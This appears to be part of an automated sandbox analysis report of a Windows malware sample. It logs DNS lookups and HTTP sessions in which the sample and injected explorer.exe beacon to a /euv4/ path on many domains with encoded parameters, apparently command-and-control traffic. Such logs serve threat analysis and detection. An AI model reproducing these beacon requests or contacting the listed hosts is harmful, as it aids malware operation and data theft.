                                                                                              Jan 28, 2022 19:04:09.138079882 CET8.8.8.8192.168.2.30x267aNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:09.138079882 CET8.8.8.8192.168.2.30x267aNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:09.138079882 CET8.8.8.8192.168.2.30x267aNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:09.138079882 CET8.8.8.8192.168.2.30x267aNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:09.138079882 CET8.8.8.8192.168.2.30x267aNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:09.138079882 CET8.8.8.8192.168.2.30x267aNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:09.138079882 CET8.8.8.8192.168.2.30x267aNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:14.563252926 CET8.8.8.8192.168.2.30xb622No error (0)www.bendyourtongue.combendyourtongue.comCNAME (Canonical name)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:14.563252926 CET8.8.8.8192.168.2.30xb622No error (0)bendyourtongue.com34.102.136.180A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:19.737186909 CET8.8.8.8192.168.2.30xa31No error (0)www.librairie-adrienne.comlibrairie-adrienne.comCNAME (Canonical name)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:19.737186909 CET8.8.8.8192.168.2.30xa31No error (0)librairie-adrienne.com192.0.78.240A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:19.737186909 CET8.8.8.8192.168.2.30xa31No error (0)librairie-adrienne.com192.0.78.141A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:34.908684969 CET8.8.8.8192.168.2.30x4294No error (0)www.alifdanismanlik.comalifdanismanlik.comCNAME (Canonical name)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:34.908684969 CET8.8.8.8192.168.2.30x4294No error (0)alifdanismanlik.com157.90.247.57A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:40.205960989 CET8.8.8.8192.168.2.30x7893No error (0)www.anniebapartments.com206.188.193.90A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:45.478863001 CET8.8.8.8192.168.2.30x3cbdName error (3)www.protection-onepa.comnonenoneA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:50.577311039 CET8.8.8.8192.168.2.30x5f7dName error (3)www.kreativevisibility.netnonenoneA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:04:55.705581903 CET8.8.8.8192.168.2.30xc090No error (0)www.20dzwww.com172.120.156.91A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:01.108038902 CET8.8.8.8192.168.2.30x64afName error (3)www.byausorsm26-plala.xyznonenoneA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:06.246817112 CET8.8.8.8192.168.2.30xcdc2Name error (3)www.alert78.infononenoneA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:11.289930105 CET8.8.8.8192.168.2.30x1c13Name error (3)www.fabio.toolsnonenoneA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:16.324215889 CET8.8.8.8192.168.2.30xd71aNo error (0)www.rematedeldia.comcompralo1234.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:16.324215889 CET8.8.8.8192.168.2.30xd71aNo error (0)compralo1234.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:16.324215889 CET8.8.8.8192.168.2.30xd71aNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:21.825874090 CET8.8.8.8192.168.2.30xea48No error (0)www.t1uba.com154.90.64.134A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:33.562211990 CET8.8.8.8192.168.2.30xef99No error (0)www.bubu3cin.com162.0.214.189A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:39.277076960 CET8.8.8.8192.168.2.30x37fcName error (3)www.awp.emailnonenoneA (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:44.312463045 CET8.8.8.8192.168.2.30x4095No error (0)www.bestpleasure4u.com34.90.73.145A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:49.411113977 CET8.8.8.8192.168.2.30x6004No error (0)www.cielotherepy.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:49.411113977 CET8.8.8.8192.168.2.30x6004No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:49.411113977 CET8.8.8.8192.168.2.30x6004No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:49.411113977 CET8.8.8.8192.168.2.30x6004No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:49.411113977 CET8.8.8.8192.168.2.30x6004No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:49.411113977 CET8.8.8.8192.168.2.30x6004No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:49.411113977 CET8.8.8.8192.168.2.30x6004No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:49.411113977 CET8.8.8.8192.168.2.30x6004No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:05:55.237948895 CET8.8.8.8192.168.2.30x8842No error (0)www.pkem.top52.89.53.122A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:06:00.660510063 CET8.8.8.8192.168.2.30x7bb3No error (0)www.bubu3cin.com162.0.214.189A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:06:11.880945921 CET8.8.8.8192.168.2.30x5334No error (0)www.ahmadfaizlajis.commyweb.propertyguru.com.myCNAME (Canonical name)IN (0x0001)
                                                                                              Jan 28, 2022 19:06:11.880945921 CET8.8.8.8192.168.2.30x5334No error (0)myweb.propertyguru.com.mymyweb.propertyguru.com.my.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                              Jan 28, 2022 19:06:11.880945921 CET8.8.8.8192.168.2.30x5334No error (0)a58e4c82ccde743a88da9ce6c3a75eed-962232103.ap-southeast-1.elb.amazonaws.com3.1.123.15A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:06:11.880945921 CET8.8.8.8192.168.2.30x5334No error (0)a58e4c82ccde743a88da9ce6c3a75eed-962232103.ap-southeast-1.elb.amazonaws.com52.74.161.166A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:06:11.880945921 CET8.8.8.8192.168.2.30x5334No error (0)a58e4c82ccde743a88da9ce6c3a75eed-962232103.ap-southeast-1.elb.amazonaws.com3.0.32.208A (IP address)IN (0x0001)
                                                                                              Jan 28, 2022 19:06:17.718286991 CET8.8.8.8192.168.2.30x6d66No error (0)www.mehfeels.commehfeels.comCNAME (Canonical name)IN (0x0001)
                                                                                              Jan 28, 2022 19:06:17.718286991 CET8.8.8.8192.168.2.30x6d66No error (0)mehfeels.com34.102.136.180A (IP address)IN (0x0001)
                                                                                              • cdn.discordapp.com
                                                                                              • www.handejqr.com
                                                                                              • www.game2plays.com
                                                                                              • www.the-pumps.com
                                                                                              • www.bendyourtongue.com
                                                                                              • www.librairie-adrienne.com
                                                                                              • www.alifdanismanlik.com
                                                                                              • www.anniebapartments.com
                                                                                              • www.20dzwww.com
                                                                                              • www.rematedeldia.com
                                                                                              • www.t1uba.com
                                                                                              • www.bubu3cin.com
                                                                                              • www.bestpleasure4u.com
                                                                                              • www.cielotherepy.com
                                                                                              • www.pkem.top
                                                                                              • www.mehfeels.com
                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.349743162.159.134.233443C:\Users\user\Desktop\Noua lista de comenzi.exe
                                                                                              TimestampkBytes transferredDirectionData


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              1192.168.2.349744162.159.134.233443C:\Users\user\Desktop\Noua lista de comenzi.exe
                                                                                              TimestampkBytes transferredDirectionData


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              10192.168.2.349819206.188.193.9080C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Jan 28, 2022 19:04:40.328286886 CET12054OUTGET /euv4/?BXxXk=2pA74KfmfI5hbfJaDEWFAi8e35ziQ8w4QN1jZFvj4D6XG6sLMhvt5UuKdjwJiJArEaUB&x6VPE=5jf8Bvhx9 HTTP/1.1
                                                                                              Host: www.anniebapartments.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Jan 28, 2022 19:04:40.445703983 CET12054INHTTP/1.1 400 Bad Request
                                                                                              Server: openresty/1.19.9.1
                                                                                              Date: Fri, 28 Jan 2022 18:04:40 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 163
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.19.9.1</center></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              11192.168.2.349820172.120.156.9180C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Jan 28, 2022 19:04:55.886413097 CET12055OUTGET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=cWiJLLMFkNIAGeNHPwohgYgPINYIsRPE+G/+VQN9zUpY6o9lKCFsb+tpXVk1tI7skOBU HTTP/1.1
                                                                                              Host: www.20dzwww.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Jan 28, 2022 19:04:56.068273067 CET12056INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Fri, 28 Jan 2022 18:04:44 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 797
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e cc c6 c9 bd b5 b4 d2 b3 d7 b0 ca ce b2 c4 c1 cf b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                              Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></head><body><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              12192.168.2.34982123.227.38.7480C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Jan 28, 2022 19:05:16.343611002 CET12058OUTGET /euv4/?x6VPE=5jf8Bvhx9&BXxXk=E+AdldMsUtuIxZV3GzeilCEOXtaM5yG6oWVR/2hlbhe5LZ2inqV2BFV3XKjv+n3r1qMt HTTP/1.1
                                                                                              Host: www.rematedeldia.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Jan 28, 2022 19:05:16.408211946 CET12059INHTTP/1.1 403 Forbidden
                                                                                              Date: Fri, 28 Jan 2022 18:05:16 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              X-Sorting-Hat-PodId: 194
                                                                                              X-Sorting-Hat-ShopId: 59946500291
                                                                                              X-Dc: gcp-europe-west1
                                                                                              X-Request-ID: a7524e7b-21da-41ed-8d26-0413ce3d8724
                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              X-Download-Options: noopen
                                                                                              X-Content-Type-Options: nosniff
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 6d4c25e13f0e915f-FRA
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                              Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c
                                                                                              Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;al


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              13192.168.2.349822154.90.64.13480C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Jan 28, 2022 19:05:22.022109032 CET12064OUTGET /euv4/?BXxXk=a7oTRd/pafA2z6myMPYHhwtmlIDdFKKQLm2w9Ocm2aQfWI2wtWEKtniCrep29h+E27Ao&x6VPE=5jf8Bvhx9 HTTP/1.1
                                                                                              Host: www.t1uba.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Jan 28, 2022 19:05:22.213695049 CET12066INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Fri, 28 Jan 2022 18:05:22 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 1809
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 cd ad c8 ca ca ce da cb d7 e2 ca db d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 31 39 39 39 37 3b 26 23 33 34 39 37 32 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 31 39 39 39 37 3b 26 23 33 34 39 37 32 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35 3b 2c 26 23 33 32 39 37 32 3b 26 23 32 34 35 30 33 3b 26 23 32 30 30 38 31 3b 26 23 33 36 37 34 34 3b 26 23 32 30 32 36 32 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 32 36 30 38 35 3b 26 23 33 38 38 38 39 3b 26 23 33 30 30 30 35 3b 26 23 32 34 34 33 33 3b 26 23 32 39 32 35 35 3b 2c 26 23 33 30 30 30 37 3b 26 23 32 32 38 39 39 3b 26 23 32 31 38 36 36 3b 26 23 32 31 38 36 36 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 2c 26 23 32 31 37 30 34 3b 26 23 32 33 35 37 32 3b 26 23 32 38 33 39 32 3b 26 23 35 34 3b 26 23 34 38 3b 26 23 32 33 36 38 31 3b 26 23 32 30 30 31 36 3b 26 23 32 38 33 38 35 3b 26 23 33 32 37 36 39 3b 26 23 32 39 30 38 37 3b 26 23 32 32 38 39 39 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 7b d7 aa d6 f7 b4 ca 7d 2c 26 23 33 32 39 37 32 3b 26 23 32 34 35 30 33 3b 26 23 32 30 30 38 31 3b 26 23 33 36 37 34 34 3b 26 23 32 30 32 36 32 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 32 36 30 38 35 3b 26 23 33 38 38 38 39 3b 26 23 33 30 30 30 35 3b 26 23 32 34 34 33 33 3b 26 23 32 39 32 35 35 3b 2c 26 23 33 30 30 30 37 3b 26 23 32 32 38 39 39 3b 26 23 32 31 38 36 36 3b 26 23 32 31 38 36 36 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 2c 26 23 32 31 37 30 34 3b 26 23 32 33 35 37 32 3b 26 23 32 38 33 39 32 3b 26 23 35 34 3b 26 23 34 38 3b 26 23 32 33 36 38 31 3b 26 23 32 30 30 31 36 3b 26 23 32 38 33 38 35 3b 26 23 33 32 37 36 39 3b 26 23 32 39 30 38 37 3b 26 23 32 32 38 39 39 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 33 30 31 34 30 3b 26 23 32 37 35 31 35 3b 26 23 32 30 31 30 32 3b 26 23 32 32 38 32 33 3b 26 23 33 31 38 39 35 3b 26 23 32 30 31 30 32 3b 26 23 32 35 39 31 38 3b 26 23 31 39 39 38 31 3b 26 23 33 36 38 32 37 3b 26 23 32 31 34 33 35 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 33 32 39 37 32 3b 26 23 32 34 35 30 33 3b 26 23 32 30 30 38 31 3b 26 23 33 36 37 34 34 3b 26 23 32 30 32 36 32 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 32 36 30 38 35 3b 26 23 33 38 38 38 39 3b 26 23 33 30 30 30 35 3b 26 23 32 34 34 33 33 3b 26 23 32 39 32 35 35 3b 2c 26 23 33 30 30 30 37 3b 26 23 32 32 38 39 39 3b 26 23 32 31 38 36 36 3b 26 23 32 31 38 36 36 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 2c 26 23 32 31 37 30 34
                                                                                              Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#22269;&#20135;&#19997;&#34972;&#22312;&#32447;&#31934;&#21697;&#19997;&#34972;&#19981;&#21345;,&#32972;&#24503;&#20081;&#36744;&#20262;&#20013;&#25991;&#23383;&#24149;&#26085;&#38889;&#30005;&#24433;&#29255;,&#30007;&#22899;&#21866;&#21866;&#20813;&#36153;&#35266;&#30475;&#26080;&#36974;&#25377;,&#21704;&#23572;&#28392;&#54;&#48;&#23681;&#20016;&#28385;&#32769;&#29087;&#22899;</title><meta name="keywords" content="{},&#32972;&#24503;&#20081;&#36744;&#20262;&#20013;&#25991;&#23383;&#24149;&#26085;&#38889;&#30005;&#24433;&#29255;,&#30007;&#22899;&#21866;&#21866;&#20813;&#36153;&#35266;&#30475;&#26080;&#36974;&#25377;,&#21704;&#23572;&#28392;&#54;&#48;&#23681;&#20016;&#28385;&#32769;&#29087;&#22899;" /><meta name="description" content="&#30140;&#27515;&#20102;&#22823;&#31895;&#20102;&#25918;&#19981;&#36827;&#21435;&#35270;&#39057;,&#32972;&#24503;&#20081;&#36744;&#20262;&#20013;&#25991;&#23383;&#24149;&#26085;&#38889;&#30005;&#24433;&#29255;,&#30007;&#22899;&#21866;&#21866;&#20813;&#36153;&#35266;&#30475;&#26080;&#36974;&#25377;,&#21704


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              14192.168.2.349823162.0.214.18980C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Jan 28, 2022 19:05:33.729599953 CET12067OUTGET /euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajj HTTP/1.1
                                                                                              Host: www.bubu3cin.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
